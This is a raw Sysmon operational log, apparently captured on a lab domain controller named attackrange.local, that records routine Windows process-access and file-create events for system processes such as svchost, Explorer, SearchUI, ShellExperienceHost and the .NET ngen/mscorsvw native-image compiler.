21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50646804C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50646804C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50645752C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+37578|C:\Windows\System32\TwinUI.dll+37498|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+3fb3d0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000022227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+375e0|C:\Windows\System32\TwinUI.dll+37485|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+3fb3d0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000022226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.853{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-FC04-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.822{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-FC04-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.822{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-FC04-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:46.775{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1100-0\TaskScheduler.dll2021-06-23 21:06:46.775 10341000x800000000000000022222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.603{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.588{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.588{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.478{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
